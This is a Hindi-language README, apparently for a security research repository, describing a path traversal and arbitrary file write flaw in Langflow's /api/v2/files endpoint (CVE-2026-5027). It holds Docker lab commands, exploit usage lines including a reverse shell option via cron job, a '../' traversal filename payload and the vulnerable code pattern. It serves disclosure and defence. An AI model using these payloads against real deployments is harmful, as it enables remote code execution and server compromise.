
CVE-2026-5027 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Langflow के /api/v2/files एंडपॉइंट में पाथ ट्रैवर्सल और आर्बिट्ररी फाइल राइट है, जिसमें Docker लैब और रिवर्स शेल विकल्प शामिल है।
यह पोस्ट EQSTLab द्वारा प्रकाशित एक शोध लेख है।
Yahia Hamza को धन्यवाद, जिन्होंने इस भेद्यता की रिपोर्ट की और विश्लेषण किया।
★ CVE-2026-5027 Langflow पाथ ट्रैवर्सल / आर्बिट्ररी फ़ाइल राइट PoC ★

CVE-2026-5027 : Langflow आर्बिट्ररी फ़ाइल राइट भेद्यता
विवरण: Langflow <= 1.8.4 में एक पाथ ट्रैवर्सल भेद्यता हमलावरों को /api/v2/files एंडपॉइंट पर भेजे गए एक तैयार किए गए मल्टीपार्ट filename के माध्यम से इच्छित अपलोड निर्देशिका के बाहर मनमानी फ़ाइलें लिखने की अनुमति देती है। उन परिनियोजनों में जहाँ ऑटो-लॉगिन सक्षम है या प्रमाणीकरण अन्यथा कमजोर रूप से लागू किया गया है, इस समस्या का उपयोग हमलावर-नियंत्रित सामग्री को संवेदनशील फ़ाइलसिस्टम स्थानों पर लिखकर रिमोट कोड निष्पादन प्राप्त करने के लिए किया जा सकता है।
Docker का उपयोग करके भेद्य वातावरण बनाएँ और चलाएँ:
docker build -t cve-2026-5027 .
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>
# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444
भेद्य एंडपॉइंट
POST /api/v2/files
यह समस्या इसलिए मौजूद है क्योंकि अपलोड कार्यक्षमता क्लाइंट द्वारा प्रदान किए गए मल्टीपार्ट filename मान पर भरोसा करती है। सुरक्षित सर्वर-साइड स्टोरेज नाम उत्पन्न करने या हल किए गए पथ को एक समर्पित अपलोड निर्देशिका तक सीमित करने के बजाय, भेद्य कोड पथ ../ जैसे ट्रैवर्सल अनुक्रमों को अंतिम गंतव्य पथ को प्रभावित करने की अनुमति देता है।
परिणामस्वरूप, एक हमलावर इच्छित स्टोरेज रूट से बाहर निकल सकता है और एप्लिकेशन को सर्वर फ़ाइलसिस्टम पर मनमानी स्थानों पर फ़ाइलें लिखने के लिए बाध्य कर सकता है।
एक प्रतिनिधि शोषण प्रवाह इस प्रकार है:
/api/v2/files पर एक मल्टीपार्ट अपलोड अनुरोध सबमिट करें।filename प्रदान करें।यह मूल रूप से एक CWE-22: Improper Limitation of a Pathname to a Restricted Directory समस्या है।
यह सुरक्षा दोष अपलोड हैंडलिंग के दौरान उपयोगकर्ता-नियंत्रित फ़ाइल पथों के अपर्याप्त सैनिटाइज़ेशन और सत्यापन के कारण होता है। एप्लिकेशन मूल क्लाइंट फ़ाइलनाम स्वीकार करता है और पथ सामान्यीकरण और कंटेनमेंट को पर्याप्त रूप से लागू किए बिना इसे स्टोरेज वर्कफ़्लो में पास कर देता है।
रक्षात्मक दृष्टिकोण से, खतरनाक पैटर्न अवधारणात्मक रूप से निम्नलिखित के समान है:
save_path = base_dir / file.filename
यदि file.filename में पाथ ट्रैवर्सल घटक जैसे:
../../../../tmp/poc.txt
हैं, तो अंतिम हल किया गया पथ base_dir के बाहर इंगित कर सकता है, जिससे मनमानी फ़ाइल राइट सक्षम हो जाता है।
आर्बिट्ररी फ़ाइल राइट भेद्यताएँ अक्सर मानक अप्रतिबंधित अपलोड समस्याओं से अधिक गंभीर होती हैं क्योंकि हमलावर न केवल फ़ाइल सामग्री को नियंत्रित करता है, बल्कि गंतव्य पथ को भी नियंत्रित करता है। Langflow प्रक्रिया के रनटाइम विशेषाधिकारों के आधार पर, यह निम्नलिखित को सक्षम कर सकता है:
+-------------------------------------------+
| Attacker |
+-------------------------------------------+
|
| Obtain access token
| or abuse auto-login
v
+-------------------------------------------+
| Langflow /api/v2/files |
+-------------------------------------------+
|
| Crafted multipart filename
| (../ directory traversal)
v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
|
| Write to sensitive location
v
+-------------------------------------------+
| Potential Remote Code Execution |
+-------------------------------------------+
यह रिपॉज़िटरी Langflow इंस्टेंस के अनधिकृत शोषण को सुविधाजनक बनाने के लिए नहीं है। इस परियोजना का उद्देश्य सुरक्षा शोधकर्ताओं, रक्षकों और डेवलपर्स को भेद्यता को समझने, नियंत्रित वातावरणों में एक्सपोज़र को मान्य करने और प्रभावी शमन उपायों को लागू करने में मदद करना है।